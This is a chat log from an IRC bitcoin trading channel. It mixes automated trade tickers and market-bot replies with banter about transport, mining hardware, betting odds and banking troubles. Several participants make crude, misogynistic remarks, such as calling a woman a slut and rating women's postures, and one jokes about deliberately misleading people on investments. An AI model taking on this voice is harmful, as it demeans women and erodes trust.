[BASIC-MINING] 6 @ 0.1253 = 0.7518 BTC [-] Sep 13 20:06:45 [BTCTC] [BASIC-MINING] 5 @ 0.1251 = 0.6255 BTC [-] Sep 13 20:06:46 [BTCTC] [BASIC-MINING] 20 @ 0.125 = 2.5 BTC [-] Sep 13 20:07:06 [BTCTC] [NASTY-PT] 6 @ 0.001856 = 0.0111 BTC [-] Sep 13 20:08:42 [HAVELOCK] [SDSTM] 3 @ 0.00244 = 0.0073 BTC [+] Sep 13 20:13:30 [BTCTC] [DMS.MINING] 3 @ 0.002663 = 0.008 BTC [+] Sep 13 20:18:55 [MPEX] [S.MPOE] 10500 @ 0.00090541 = 9.5068 BTC [+] Sep 13 20:19:51 mpoe gem! Sep 13 20:23:40 totally. Sep 13 20:24:47 [BTCTC] [RSM] 21 @ 0.004953 = 0.104 BTC [+] Sep 13 20:24:49 [BTCTC] [RSM] 1 @ 0.004954 BTC [+] Sep 13 20:28:26 i'm thinking goxprice will break $152 in the next 7 days Sep 13 20:28:57 ;;market buy 0 Sep 13 20:28:58 An error has occurred and has been logged. Please contact this bot's administrator for more information. Sep 13 20:29:12 ;;market buy 1 Sep 13 20:29:13 A market order to buy 1 bitcoins right now would take 140.8243 USD and would take the last price up to 140.8498 USD, resulting in an average price of 140.8243 USD/BTC. | Data vintage: 0.0000 seconds Sep 13 20:29:24 ;;market bid 0 Sep 13 20:29:24 Error: The "Market" plugin is loaded, but there is no command named "bid" in it. Try "list Market" to see the commands in the "Market" plugin. Sep 13 20:29:37 ah Sep 13 20:29:42 ;;market --buy 1 Sep 13 20:29:42 A market order to buy 1 bitcoins right now would take 140.8243 USD and would take the last price up to 140.8498 USD, resulting in an average price of 140.8243 USD/BTC. | Data vintage: 29.6167 seconds Sep 13 20:29:49 ;;market --bid 1 Sep 13 20:29:49 Error: The "Market" plugin is loaded, but there is no command named "--bid" in it. Try "list Market" to see the commands in the "Market" plugin. Sep 13 20:29:51 dammit Sep 13 20:30:04 ;;market bids 0 Sep 13 20:30:04 There are currently 22380683 bitcoins demanded at or over 0.0 USD, worth 14030829.6405 USD in total. | Data vintage: 51.5057 seconds Sep 13 20:30:32 [HAVELOCK] [XBOND] 94 @ 0.0011745 = 0.1104 BTC [+] Sep 13 20:30:35 [HAVELOCK] [XBOND] 10 @ 0.001171 = 0.0117 BTC [-] Sep 13 20:30:37 [HAVELOCK] [XBOND] 196 @ 0.00117 = 0.2293 BTC [-] Sep 13 20:30:51 http://thefilmexperience.net/storage/nicole-paparazzi.jpg Sep 13 20:30:55 fucking hipsters Sep 13 20:31:02 riding a bike should be a misdemeanor. Sep 13 20:31:12 ;;market --buy 15400 Sep 13 20:31:12 A market order to buy 15400 bitcoins right now would take 2268715.9277 USD and would take the last price up to 150.9886 USD, resulting in an average price of 147.3192 USD/BTC. | Data vintage: 119.6933 seconds Sep 13 20:31:40 dont ever go to Amsterdam Sep 13 20:31:52 [BTCTC] [MININGCO.ETF] 1 @ 0.095 BTC [+] Sep 13 20:32:33 [HAVELOCK] [XBOND] 10 @ 0.00117 = 0.0117 BTC [-] Sep 13 20:32:37 [BTCTC] [BASIC-MINING] 3 @ 0.1394 = 0.4182 BTC [+] Sep 13 20:33:04 [BTCTC] [KENILWORTH] 5 @ 0.001784 = 0.0089 BTC [-] Sep 13 20:33:05 [BTCTC] [KENILWORTH] 60 @ 0.001784 = 0.107 BTC [-] Sep 13 20:34:07 funny coincidence Sep 13 20:34:08 http://www.fastcompany.com/3017395/fast-feed/stay-safe-use-a-usb-condom Sep 13 20:34:08 what do you ride, horses? Sep 13 20:34:42 [BTCTC] [TAT.ASICMINER] 14 @ 0.021 = 0.294 BTC [+] Sep 13 20:35:41 tat that's cool, brilliant idea Sep 13 20:35:43 i don;'t tend to go to amsterdam/nordic places specifically becauise of the bike idiocy. Sep 13 20:35:50 pankkake what's wrong with walking already! Sep 13 20:36:05 you got feet. you're not fucking handicapped. why not just do naturally! Sep 13 20:36:09 why walk when you can camel! Sep 13 20:36:22 how did you not see that coming? :P Sep 13 20:36:23 oh I walk, I don't even have a car Sep 13 20:36:48 ima write about this. fucking hell with the servile class even being allowed above ground in town anymore. Sep 13 20:38:11 [BTCTC] [ASICMINER-PT] 2 @ 2.195 = 4.39 BTC [-] Sep 13 20:38:11 US should be less worried about Syria and more worried about mircea_popescu Sep 13 20:38:18 god help us if he gets a nuke Sep 13 20:38:32 you can probably get one on silk road Sep 13 20:38:33 i don't need a nuke. Sep 13 20:39:00 he has mpoe-pr Sep 13 20:39:15 [BTCTC] [LABCOIN] 5 @ 0.003449 = 0.0172 BTC [-] Sep 13 20:39:16 i am on FIRE today Sep 13 20:39:18 [BTCTC] [LABCOIN] 151 @ 0.00345 = 0.521 BTC [+] Sep 13 20:39:30 [BTCTC] [KENILWORTH] 435 @ 0.001785 = 0.7765 BTC [+] Sep 13 20:40:14 well she may be a bomb, but not sure about nuke. Sep 13 20:40:27 [BTCTC] [LABCOIN] 149 @ 0.00345 = 0.5141 BTC [+] Sep 13 20:45:30 [BTCTC] [DMS.SELLING] 130 @ 0.0094 = 1.222 BTC [-] Sep 13 20:45:44 [HAVELOCK] [XBOND] 1 @ 0.001187 BTC [+] Sep 13 20:47:27 [BTCTC] [ASICMINER-PT] 5 @ 2.195 = 10.975 BTC [-] Sep 13 20:47:29 [BTCTC] [ASICMINER-PT] 4 @ 2.192 = 8.768 BTC [-] Sep 13 20:47:29 [BTCTC] [ASICMINER-PT] 1 @ 2.181 BTC [-] Sep 13 20:47:30 [BTCTC] [ASICMINER-PT] 4 @ 2.18 = 8.72 BTC [-] Sep 13 20:50:12 [BTCTC] [LABCOIN] 30 @ 0.003467 = 0.104 BTC [+] Sep 13 20:50:48 [BTCTC] [BTC-TRADING-PT] 1 @ 1.01 BTC [+] Sep 13 20:51:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.0207 = 0.0621 BTC [-] Sep 13 20:51:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.0207 = 0.207 BTC [-] Sep 13 20:52:57 http://trilema.com/2013/time-to-reform-transportation/ Sep 13 20:53:55 Sounds like something I would read in GA Sep 13 20:54:44 georgia ? Sep 13 20:54:57 it's a state. Sep 13 20:55:02 yes sir Sep 13 20:55:04 also a country. Sep 13 20:55:08 but I think he means the state. Sep 13 20:55:12 ^ Sep 13 20:55:30 Our public transporation is a complete joke Sep 13 20:55:39 "Ist of all, cars are not cool." have you seen an R8?! Sep 13 20:55:59 Try telling that to Jay Leno Sep 13 20:56:00 yes, yes. Sep 13 20:56:20 you can put chrome on a dildo, too, you know. Sep 13 20:56:23 it doesn't have to be a car. Sep 13 20:56:30 perhaps you'd be happier that way. Sep 13 20:56:30 ha Sep 13 20:56:41 Doesn't sound like you're a car person Sep 13 20:56:44 Could be wrong Sep 13 20:56:50 Rulother__ well, actually i am lol Sep 13 20:57:00 i just don't like driving, and most other people driving. Sep 13 20:57:01 Refer to my last statement lol Sep 13 20:57:30 I love driving, just hate everyone else Sep 13 20:57:39 and all the stuff they cause, like stoplights Sep 13 20:57:42 wtf is that even. Sep 13 21:00:08 I like this way of transportation http://i.imgur.com/hsQG3p6.jpg Sep 13 21:00:54 nice love handles on her. Sep 13 21:02:18 [BTCTC] [ACTIVEMINING] 10 @ 0.002905 = 0.0291 BTC [+] Sep 13 21:03:31 [BTCTC] [ACTIVEMINING] 328 @ 0.002908 = 0.9538 BTC [+] Sep 13 21:03:45 http://www.actsofgord.com/Justice/chapter01.php Sep 13 21:03:53 [HAVELOCK] [XBOND] 1 @ 0.001187 BTC [+] Sep 13 21:03:56 apparently the gord dood is not in the wikipedia ? Sep 13 21:04:15 wouldn't you expect all the virgin geeks playing 7th grader power gameso n wikipedia to make him their god ? Sep 13 21:04:32 weird Sep 13 21:05:23 oh but Gor has thousands of articles Sep 13 21:05:54 [MPEX] [S.MPOE] 1245 @ 0.00090541 = 1.1272 BTC [+] Sep 13 21:05:56 [MPEX] [S.MPOE] 2400 @ 0.00090559 = 2.1734 BTC [+] Sep 13 21:06:38 [HAVELOCK] [HIM] 19 @ 0.155 = 2.945 BTC [+] Sep 13 21:06:57 gor != the cali gord guy going around witgh ponygirls no ? Sep 13 21:07:36 yeah that's different, I was confused Sep 13 21:07:56 it's some fiction franchise or something. Sep 13 21:10:24 pankkake lol i need one of those http://i.imgur.com/hsQG3p6.jpg Sep 13 21:15:28 high heels will be mandatory Sep 13 21:15:30 oh you Sep 13 21:15:41 http://linustechtips.com/main/uploads/monthly_08_2013/post-2255-0-84533200-1377705440.jpeg Sep 13 21:16:16 [HAVELOCK] [XBOND] 43 @ 0.00114 = 0.049 BTC [-] Sep 13 21:16:36 benkay gotta make it obvious when i joek or otherwise btctalk fills up with discussions of how misogeeneestec mp is Sep 13 21:17:00 i didn't notice much screeching about your russia post Sep 13 21:17:05 that was pretty incendiary Sep 13 21:17:12 [HAVELOCK] [SDSTM] 3 @ 0.00287 = 0.0086 BTC [+] Sep 13 21:17:23 i also don't read btctalk so my perceptions are indubitably biased Sep 13 21:17:42 benkay selection bias. by now the people that read me tend to have had trhe same ideas for a while, Sep 13 21:17:50 [BTCTC] [ACTIVEMINING] 461 @ 0.002908 = 1.3406 BTC [+] Sep 13 21:17:50 and the people that don't read me... well... Sep 13 21:17:51 [BTCTC] [ACTIVEMINING] 1385 @ 0.002909 = 4.029 BTC [+] Sep 13 21:17:56 may god take marci on their soulz. Sep 13 21:18:06 no mercy for the dumb Sep 13 21:18:11 no souls in the masses Sep 13 21:18:23 marci is a slut, she enjoys being taken a lot. Sep 13 21:18:39 https://bitcointalk.org/index.php?topic=170332.msg3145437#msg3145437 Sep 13 21:18:40 in other news, mircea_popescu, marvel at this bombastic shit: postmodernvanguard.com Sep 13 21:18:44 Swedish ASIC miner company kncminer.com Sep 13 21:18:52 [HAVELOCK] [AM100] 1 @ 0.02111 BTC [+] Sep 13 21:19:21 ThickAsThieves the great quantity of boxes impresses me. Sep 13 21:19:24 where's that quote... Sep 13 21:19:33 is there a unit in that pile? Sep 13 21:19:49 dont mention 'unit' Sep 13 21:19:50 boxes of fans Sep 13 21:19:53 http://news.discovery.com/earth/oceans/hawaii-molasses-spill-130913.htm#mkcpgn=rssnws1 Sep 13 21:19:55 Hawaiian Molasses Spill: Cleanup As Slow As : Discovery News Sep 13 21:20:03 Jerry: When you're moving your whole world becomes boxes. That's all you think about is boxes. Boxes, where are those boxes? You just wander down the street going in and out of stores.... are there boxes here? Have you seen any boxes? You can't even talk to people because you can't concentrate... shut up, I'm looking for boxes! Just after a while you become really into it... you can smell them. You walk into a store... Sep 13 21:20:03 there's boxes here. Don't tell me you don't have boxes, I can SMELL them.... Sep 13 21:20:14 [HAVELOCK] [SDSTM] 5 @ 0.00287 = 0.0144 BTC [+] Sep 13 21:20:31 [MPEX] [S.MPOE] 5218 @ 0.0009058 = 4.7265 BTC [+] Sep 13 21:20:32 [MPEX] [S.MPOE] 2682 @ 0.00090477 = 2.4266 BTC [-] Sep 13 21:20:59 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 13 21:21:05 like 2 to 1 on yes that thing Sep 13 21:21:07 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 13 21:22:19 less, weighted. Sep 13 21:22:40 how much will i get putting 10 on no Sep 13 21:22:48 oh here we go again Sep 13 21:22:56 make a calc kako Sep 13 21:22:57 geez Sep 13 21:23:02 make a calc someone Sep 13 21:23:05 add some features Sep 13 21:23:06 be less stupid Sep 13 21:23:07 geez Sep 13 21:23:08 yknow Sep 13 21:23:09 nobody got time for this weighted nonsense Sep 13 21:23:10 develope Sep 13 21:23:13 [BTCTC] [RSM] 340 @ 0.005 = 1.7 BTC [+] Sep 13 21:23:16 [BTCTC] [LABCOIN] 136 @ 0.003464 = 0.4711 BTC [-] Sep 13 21:23:18 -e Sep 13 21:23:29 it's not easy i never liked mathematics Sep 13 21:23:41 math rulez the universe Sep 13 21:23:42 i have to take 5 minute to calc 0.34btc often Sep 13 21:23:45 youre providing a service Sep 13 21:23:48 coconut about 20% if you bet now. Sep 13 21:23:48 i mean 0.34mbtc Sep 13 21:23:50 provide! Sep 13 21:23:59 wtf is 0.34mbtc in btc Sep 13 21:24:10 the maff is in the comments Sep 13 21:24:14 ThickAsThieves he's doing it he's doing it. has a patience. Sep 13 21:24:21 who care about maff Sep 13 21:24:26 just being dramatic Sep 13 21:24:28 that's why we have calculators Sep 13 21:24:36 i do the maff on requirement Sep 13 21:24:44 so basically how much will i earn? Sep 13 21:24:53 a fuckton Sep 13 21:24:56 lol Sep 13 21:25:04 coconut about 20% on yes about 40% on no Sep 13 21:25:06 this i can work with Sep 13 21:25:07 [BTCTC] [LABCOIN] 136 @ 0.003464 = 0.4711 BTC [-] Sep 13 21:25:08 ok Sep 13 21:25:47 the best software tools are the ones that let people count money they dont have Sep 13 21:25:52 [BTCTC] [LABCOIN] 36 @ 0.003464 = 0.1247 BTC [-] Sep 13 21:27:17 lol Sep 13 21:27:19 son i am astonish Sep 13 21:27:25 i can't math! Sep 13 21:27:35 but with reeeesarch i will outinvest u AWL Sep 13 21:27:38 t'sup mjr Sep 13 21:28:45 my blog just said to me sorry but it only accepts comments from actual human beings Sep 13 21:28:48 WHAT HAVE I BECOME Sep 13 21:29:05 a space spreadsheet pilot in a nutrient bath Sep 13 21:29:16 duh Sep 13 21:30:53 [BTCTC] [LABCOIN] 38 @ 0.003462 = 0.1316 BTC [-] Sep 13 21:31:02 ok, my bank stuff is now in limbo where 2 banks constantly throw each other the ball but never do anything. Sep 13 21:31:12 Namworld prolly last a while. Sep 13 21:31:42 [BTCTC] [LABCOIN] 5 @ 0.003462 = 0.0173 BTC [-] Sep 13 21:31:49 It's been over 1 month already. Sep 13 21:32:03 bahahaha Sep 13 21:32:06 split brain banking Sep 13 21:32:11 That's complete uselessness. Sep 13 21:32:19 luls: not just for bitcoin anymore Sep 13 21:32:22 No debit card, no credit card access. Sep 13 21:32:31 Luckily Bitcoin still works. Sep 13 21:32:32 distributed computing without authority EL OH EL Sep 13 21:32:45 I can sell that for cash localy no problem. Sep 13 21:33:11 i never understood credit cards..spend money that is not yours? Sep 13 21:33:20 locally* Sep 13 21:33:32 coconut: there's probably a lot about finance you don't understand. Sep 13 21:33:34 cash is best Sep 13 21:33:44 [BTCTC] [PETA-MINE] 1 @ 0.655 BTC [+] Sep 13 21:33:55 credit cards for broke guys Sep 13 21:34:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0206 BTC [-] Sep 13 21:34:25 you can get a lot of cash out of some of them Sep 13 21:34:30 making up for losses on the others Sep 13 21:34:42 [BTCTC] [ASICMINER-PT] 2 @ 2.183 = 4.366 BTC [+] Sep 13 21:34:54 american dream buy iphone 5s contract with amex Sep 13 21:35:05 identify the deadbeats as quickly as possible, and securitize their debts Sep 13 21:35:26 keep the lucrative borrowers on tap for as long as possible Sep 13 21:35:26 let's do a little bdsm exercise. score the posture of the girls : http://31.media.tumblr.com/e780826a5ed694cb39e502470043ec67/tumblr_molbyxnJG91qlne6uo1_1280.png Sep 13 21:35:30 securitize Sep 13 21:35:39 blonde>> Sep 13 21:35:49 coconut: http://en.wikipedia.org/wiki/Securitization Sep 13 21:35:58 [HAVELOCK] [AM1] 2 @ 2.239 = 4.478 BTC [+] Sep 13 21:36:00 is that like burgalarize Sep 13 21:36:22 to this day cannot believe this word is real Sep 13 21:36:26 it's like selling junk. Sep 13 21:36:26 far brunnette looks like she knows what's up Sep 13 21:36:32 [HAVELOCK] [HIM] 10 @ 0.156 = 1.56 BTC [+] Sep 13 21:36:35 [BTCTC] [ACTIVEMINING] 449 @ 0.003064 = 1.3757 BTC [+] Sep 13 21:36:36 [BTCTC] [ACTIVEMINING] 51 @ 0.003067 = 0.1564 BTC [+] Sep 13 21:36:39 benkay #1 #2 #3 #4 ? Sep 13 21:37:21 3 Sep 13 21:38:38 I like #4 Sep 13 21:39:14 yeah 3 is like 10/10 Sep 13 21:39:18 getting nsfw in here Sep 13 21:39:22 4 is so bad i dunno how she made it on the set. Sep 13 21:39:36 4 is constipated Sep 13 21:40:24 [HAVELOCK] [AM1] 2 @ 2.239 = 4.478 BTC [+] Sep 13 21:41:05 lol Sep 13 21:42:24 http://fc07.deviantart.net/fs70/f/2012/220/7/2/pony_girls_by_the_little_skylark-d5abzgm.png meh Sep 13 21:43:54 asciilifeform https://bitcointalk.org/index.php?topic=286610.msg3085069#msg3085069 Sep 13 21:44:03 http://i.minus.com/ibeTGer1bEYrgm.gif Sep 13 21:44:32 what is PM Sep 13 21:44:54 [BTCTC] [LABCOIN] 5 @ 0.003397 = 0.017 BTC [-] Sep 13 21:44:55 [BTCTC] [LABCOIN] 1 @ 0.003396 BTC [-] Sep 13 21:44:56 [BTCTC] [LABCOIN] 300 @ 0.003395 = 1.0185 BTC [-] Sep 13 21:44:57 [BTCTC] [LABCOIN] 346 @ 0.003385 = 1.1712 BTC [-] Sep 13 21:44:58 [BTCTC] [LABCOIN] 150 @ 0.003376 = 0.5064 BTC [-] Sep 13 21:44:59 [BTCTC] [LABCOIN] 70 @ 0.003375 = 0.2363 BTC [-] Sep 13 21:45:00 [BTCTC] [LABCOIN] 138 @ 0.003358 = 0.4634 BTC [-] Sep 13 21:45:46 primecoin? Sep 13 21:48:00 coconut: good idea but bad implementation Sep 13 21:48:12 [BTCTC] [CIPHERMINE-PT] 25 @ 0.061 = 1.525 BTC [-] Sep 13 21:48:17 [BTCTC] [CIPHERMINE-PT] 25 @ 0.061 = 1.525 BTC [-] Sep 13 21:48:18 [BTCTC] [CIPHERMINE-PT] 20 @ 0.061 = 1.22 BTC [-] Sep 13 21:48:20 [BTCTC] [CIPHERMINE-PT] 2 @ 0.061 = 0.122 BTC [-] Sep 13 21:49:25 I only have used devcoin and namecoin Sep 13 21:49:52 Wow. VMC reduced prices a lot... No announcement, of course. Just ninja changes on the site. LOL: http://virtualminingcorp.com/shop1/index.php?id_category=15&controller=category Sep 13 21:50:25 heh. Sep 13 21:50:30 cheap hamburgers? Sep 13 21:50:36 Very cheap. Sep 13 21:50:53 Fucking love hamburgers Sep 13 21:51:08 "Available" Sep 13 21:51:12 [BTCTC] [LABCOIN] 86 @ 0.00346 = 0.2976 BTC [+] Sep 13 21:51:16 wtf is wrong with Microsoft Sep 13 21:51:22 kinda misleading Sep 13 21:51:26 1.5th/s for 9k Sep 13 21:51:27 [BTCTC] [DMS.MINING] 1 @ 0.00266 BTC [-] Sep 13 21:51:30 not bad Sep 13 21:51:33 everyone is slashing the prices dramatically Sep 13 21:51:40 Whats wrong With Mr Softee Sep 13 21:51:41 [HAVELOCK] [CBTC] 1 @ 0.00042499 BTC [+] Sep 13 21:51:52 they really think marketing making fun of every better company will solve their problems? Sep 13 21:51:54 Actually, the old laughing stock was the 25th/s which is now like 5.3$/GH Sep 13 21:52:14 is there a bet that BFL will deliver on time next gen? Sep 13 21:52:23 not sofar. Sep 13 21:52:30 can you create it Sep 13 21:52:35 you can Sep 13 21:52:52 ken said he is working on getting a deal with a pr marketing firm Sep 13 21:52:53 someone needs to create one about ASICMINER gen2 as well Sep 13 21:52:53 I'm so lazy I won't create, but I would bet Sep 13 21:53:02 ThickAsThieves: yeah I'm an apple hater but these ads are terrible Sep 13 21:54:14 [BTCTC] [DMS.SELLING] 24 @ 0.009549 = 0.2292 BTC [+] Sep 13 21:54:15 [BTCTC] [DMS.SELLING] 42 @ 0.00955 = 0.4011 BTC [+] Sep 13 21:54:17 [BTCTC] [DMS.SELLING] 42 @ 0.0096 = 0.4032 BTC [+] Sep 13 21:55:23 and they keep doing it Sep 13 21:55:26 scroogled, etc Sep 13 21:55:37 i guess they wanna lock down the idiots Sep 13 21:55:39 Links to these atrocious ads? Sep 13 21:56:23 http://www.theverge.com/2013/9/13/4727186/windows-phone-continues-crusade-against-apple-with-new-videos Sep 13 21:56:29 Windows Phone continues crusade against Apple with seven mocking videos | The Verge Sep 13 21:56:29 they are also buying ipads now Sep 13 21:56:57 horrible Sep 13 21:57:07 [BTCTC] [DMS.PURCHASE] 8 @ 0.01196 = 0.0957 BTC [-] Sep 13 21:57:21 [BTCTC] [MININGCO.ETF] 1 @ 0.0999 BTC [+] Sep 13 21:59:19 typical microsoft, pay you to use their products Sep 13 21:59:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0206 = 0.0824 BTC [-] Sep 13 21:59:42 [BTCTC] [LABCOIN] 100 @ 0.0033 = 0.33 BTC [-] Sep 13 21:59:58 pretty sure apple invented the concept Sep 13 22:00:20 well, giving it away at least Sep 13 22:00:46 how so? Sep 13 22:01:26 [BTCTC] [DMS.SELLING] 8 @ 0.0094 = 0.0752 BTC [-] Sep 13 22:01:28 for advertising maybe? but microsoft targets end-users when they pay Sep 13 22:01:30 as i recall from some mktg textbook, Apple cornered the education and media creation users during the IIe dats Sep 13 22:01:34 days* Sep 13 22:01:35 oh Sep 13 22:01:41 by giving units to schools, etc Sep 13 22:01:52 and PCs took the business market Sep 13 22:02:03 worked out fine for a while Sep 13 22:02:15 and Apple still had a hold on media market Sep 13 22:02:18 has* Sep 13 22:02:49 [BTCTC] [LABCOIN] 1 @ 0.003456 BTC [+] Sep 13 22:02:56 graphic designers love their macs Sep 13 22:03:02 [BTCTC] [LABCOIN] 45 @ 0.003456 = 0.1555 BTC [+] Sep 13 22:03:07 and Pro Tools users Sep 13 22:03:08 etc Sep 13 22:03:14 [BTCTC] [LABCOIN] 7 @ 0.003456 = 0.0242 BTC [+] Sep 13 22:04:26 http://www.wired.co.uk/news/archive/2013-09/13/digital-economy-task-force Sep 13 22:04:31 Bitcoin, Tor and Gates Foundation join task force to prevent child exploitation (Wired UK) Sep 13 22:04:56 lmao Sep 13 22:05:04 [MPEX] [S.MPOE] 4150 @ 0.00090735 = 3.7655 BTC [+] Sep 13 22:05:07 the foundation Sep 13 22:05:09 task-suck-me, what force. Sep 13 22:05:34 mircea_popescu you aren't involved in any human trafficking are you? Sep 13 22:05:39 because if so... watch out Sep 13 22:05:50 bitcoin foundation gonna get you sucka Sep 13 22:05:53 well according to the forum i also deal in alien parts. Sep 13 22:06:57 [BTCTC] [LABCOIN] 2957 @ 0.003462 = 10.2371 BTC [+] Sep 13 22:06:58 [BTCTC] [LABCOIN] 3000 @ 0.003462 = 10.386 BTC [+] Sep 13 22:07:17 [HAVELOCK] [SDSTM] 9 @ 0.0028733 = 0.0259 BTC [+] Sep 13 22:07:20 [BTCTC] [LABCOIN] 100 @ 0.003466 = 0.3466 BTC [+] Sep 13 22:07:21 [BTCTC] [LABCOIN] 1300 @ 0.003469 = 4.5097 BTC [+] Sep 13 22:07:22 [BTCTC] [LABCOIN] 50 @ 0.003469 = 0.1735 BTC [+] Sep 13 22:16:46 lol wut Sep 13 22:16:59 alien parts? Sep 13 22:18:09 yes and pickled herring. Sep 13 22:19:04 [BTCTC] [LABCOIN] 150 @ 0.003479 = 0.5219 BTC [+] Sep 13 22:19:22 [BTCTC] [DMS.MINING] 2 @ 0.00266 = 0.0053 BTC [-] Sep 13 22:19:23 [BTCTC] [DMS.MINING] 8 @ 0.00266 = 0.0213 BTC [-] Sep 13 22:19:47 [BTCTC] [DMS.MINING] 5 @ 0.00266 = 0.0133 BTC [-] Sep 13 22:21:18 [BTCTC] [BITVPS] 20 @ 0.002 = 0.04 BTC [+] Sep 13 22:22:32 [MPEX] [S.MPOE] 7300 @ 0.00090735 = 6.6237 BTC [+] Sep 13 22:22:33 [MPEX] [S.MPOE] 800 @ 0.00090477 = 0.7238 BTC [-] Sep 13 22:22:40 [BTCTC] [LABCOIN] 154 @ 0.00348 = 0.5359 BTC [+] Sep 13 22:24:15 o god http://www.egifter.com/ - there's a crutchfield option now Sep 13 22:25:26 [BTCTC] [LABCOIN] 550 @ 0.00348 = 1.914 BTC [+] Sep 13 22:27:37 tough markets these, doing nothing much that anyone can do just as well. Sep 13 22:28:15 [HAVELOCK] [XBOND] 10 @ 0.001187 = 0.0119 BTC [+] Sep 13 22:28:18 [BTCTC] [LABCOIN] 300 @ 0.00348 = 1.044 BTC [+] Sep 13 22:31:56 [BTCTC] [LABCOIN] 500 @ 0.00348 = 1.74 BTC [+] Sep 13 22:33:22 [HAVELOCK] [AM1] 4 @ 2.24 = 8.96 BTC [+] Sep 13 22:34:22 [HAVELOCK] [VTX] 1 @ 0.589 BTC [+] Sep 13 22:34:27 [HAVELOCK] [AM1] 2 @ 2.24 = 4.48 BTC [+] Sep 13 22:35:42 [BTCTC] [LABCOIN] 625 @ 0.00348 = 2.175 BTC [+] Sep 13 22:36:49 [BTCTC] [BASIC-MINING] 1 @ 0.126 BTC [-] Sep 13 22:38:05 [MPEX] [S.MPOE] 23 @ 0.00090477 = 0.0208 BTC [-] Sep 13 22:38:20 [MPEX] [S.MPOE] 3000 @ 0.00090347 = 2.7104 BTC [-] Sep 13 22:45:25 [BTCTC] [LABCOIN] 12 @ 0.00348 = 0.0418 BTC [+] Sep 13 22:45:37 [BTCTC] [CB.IDIFF-E] 50 @ 0.0249 = 1.245 BTC [-] Sep 13 22:47:03 [BTCTC] [CB.IDIFF-E] 49 @ 0.0249 = 1.2201 BTC [-] Sep 13 22:47:18 [BTCTC] [CIPHERMINE-PT] 20 @ 0.0622 = 1.244 BTC [+] Sep 13 22:47:20 [BTCTC] [CIPHERMINE-PT] 10 @ 0.06345 = 0.6345 BTC [+] Sep 13 22:47:21 [BTCTC] [CIPHERMINE-PT] 10 @ 0.0639 = 0.639 BTC [+] Sep 13 22:47:22 [BTCTC] [CIPHERMINE-PT] 3 @ 0.06425 = 0.1928 BTC [+] Sep 13 22:47:22 [BTCTC] [CIPHERMINE-PT] 7 @ 0.06433 = 0.4503 BTC [+] Sep 13 22:47:23 [BTCTC] [CIPHERMINE-PT] 2 @ 0.06499 = 0.13 BTC [+] Sep 13 22:47:24 [BTCTC] [CIPHERMINE-PT] 3 @ 0.06499 = 0.195 BTC [+] Sep 13 22:47:26 [HAVELOCK] [AM100] 9 @ 0.02109 = 0.1898 BTC [-] Sep 13 22:47:41 [BTCTC] [CB.IDIFF-E] 41 @ 0.025 = 1.025 BTC [+] Sep 13 22:50:55 [BTCTC] [DMS.PURCHASE] 1 @ 0.01196 BTC [-] Sep 13 22:53:03 [BTCTC] [CB.IDIFF-E] 20 @ 0.025 = 0.5 BTC [+] Sep 13 22:53:28 ;;estimate Sep 13 22:53:29 Next difficulty estimate | 110480742.062 based on data since last change | 127802753.345 based on data for last three days Sep 13 22:54:16 [BTCTC] [DMS.MINING] 2 @ 0.00266 = 0.0053 BTC [-] Sep 13 22:59:17 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 13 23:02:31 [HAVELOCK] [HIM] 2 @ 0.156 = 0.312 BTC [+] Sep 13 23:03:05 [HAVELOCK] [AM1] 7 @ 2.24 = 15.68 BTC [+] Sep 13 23:04:12 [BTCTC] [CIPHERMINE-PT] 3 @ 0.06499 = 0.195 BTC [+] Sep 13 23:04:49 [BTCTC] [CIPHERMINE-PT] 8 @ 0.06544 = 0.5235 BTC [+] Sep 13 23:05:36 [HAVELOCK] [CBTC] 2000 @ 0.00039 = 0.78 BTC [-] Sep 13 23:09:23 reeses !? when did you get out. Sep 13 23:10:03 I'm using a voice-to-text service and thought I would first use it for IRC Sep 13 23:10:38 reeses: why? you are blind? Sep 13 23:10:52 yes Sep 13 23:10:55 no just lazy Sep 13 23:10:56 like justice Sep 13 23:10:56 wait, what ?! Sep 13 23:11:03 hi reeses Sep 13 23:11:09 hey jcpham Sep 13 23:11:13 gimme all your bitcoins fucker Sep 13 23:11:20 he has bitcoins now ? Sep 13 23:11:20 ok Sep 13 23:11:31 how long have i been asleep! Sep 13 23:11:31 woohoo i'm reech i tell ya Sep 13 23:11:56 reeeses, are you using text-to-voice too? Sep 13 23:12:11 nope, he just ignores that part :D Sep 13 23:12:25 nothing good comes of taking input from other people Sep 13 23:12:32 I merely bestow my wisdom Sep 13 23:12:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.021 BTC [+] Sep 13 23:12:46 i don't even do that anymore Sep 13 23:12:50 any hot investments lately ? Sep 13 23:12:57 i purposefully mislead Sep 13 23:13:08 you cannot admit that Sep 13 23:13:12 you have to say it's wisdom Sep 13 23:13:15 oops Sep 13 23:13:25 mircea_popescu: cancer meds :( Sep 13 23:13:33 what, still ? Sep 13 23:13:39 smoothie selling silver litecoins = mind blown Sep 13 23:13:45 [BTCTC] [DMS.PURCHASE] 5 @ 0.01196 = 0.0598 BTC [-] Sep 13 23:14:25 MORE CANCER Sep 13 23:14:30 look you even have voice on #trilema still. Sep 13 23:14:30 leukemia this time Sep 13 23:14:33 wb fucker. Sep 13 23:14:50 my dad is obviously telling god to eat shit :-) Sep 13 23:15:21 to quote the guy in magnolia, "would you do me a personal favour ?" Sep 13 23:16:36 wait who has cancer Sep 13 23:17:08 my money's on his trophy wife. Sep 13 23:17:17 everyone seems to have cancer these days. must be the hipster thing Sep 13 23:17:27 high fructose corn syrup prolly Sep 13 23:21:48 my dad has cancer #3 so I checked out for a bit, plus btc was boring when it was just increasing in value Sep 13 23:21:52 takes the fun out of it Sep 13 23:22:18 [BTCTC] [DMS.PURCHASE] 41 @ 0.01196 = 0.4904 BTC [-] Sep 13 23:25:42 are ebay deal blogs user created or created bt ebay? anyone know? Sep 13 23:25:42 *by Sep 13 23:25:42 http://deals.ebay.com/blog/whats-the-deal-with-bitcoins-anyway/ Sep 13 23:25:44 What's the Deal with Bitcoins Anyway? | Daily Deals BlogDaily Deals Blog Sep 13 23:27:09 i know Sep 13 23:27:13 it's created by ebay deals Sep 13 23:27:24 or more likely by an outsourced content provider Sep 13 23:27:50 yeah, i'm just curious, they did this exact 